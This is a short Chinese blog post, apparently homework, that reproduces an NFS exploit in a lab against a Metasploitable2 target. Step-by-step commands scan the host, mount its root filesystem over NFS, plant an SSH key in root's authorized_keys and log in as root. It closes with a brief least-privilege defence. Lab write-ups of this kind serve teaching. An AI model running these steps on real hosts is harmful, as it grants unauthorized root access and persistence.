NFS服务漏洞复现
NFS服务漏洞复现
TeamsSix
发布于 2019-09-24 17:41:12
发布于 2019-09-24 17:41:12
代码可运行
运行总次数:0
代码可运行
刚交了一份作业,关于NFS服务利用的,这里简单介绍一下。
NFS全称Network File System,即网络文件系统,属于网络层,主要用于网络间文件的共享,最早由sun公司开发。
复现环境:Kali2017、Metasploit2 复现思路:利用NFS服务将本地主机的ssh公钥传输到目标主机上,再利用ssh连接到目标主机
1、首先利用nmap扫描一下目标主机,查看是否存在ssh、nfs服务
~# nmap 172.16.1.130 -p 22,2049
2、在kali下连接靶机的NFS服务
~# apt-get install nfs-comm
~# showmount -e 172.16.1.130
~# mkdir /tmp/172.16.1.130
~# mount -t nfs 172.16.1.130:/ /tmp/172.16.1.130/
~# cd /tmp/172.16.1.130/
~# ls -la
3、将本地主机的ssh公钥发送到目标主机并通过ssh连接靶机
~# ssh-keygen
~# cat .ssh/id_rsa.pub >> /tmp/172.16.1.130/root/.ssh/authorized_keys
~# ssh root@172.16.1.130
4、这个漏洞防御也主要在于权限的问题,本着最小权限的思想,对于一些普通文件所属用户普通用户即可,对于敏感的目录要限制普通用户访问。
本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2018-10-01,如有侵权请联系 cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读
腾讯云开发者
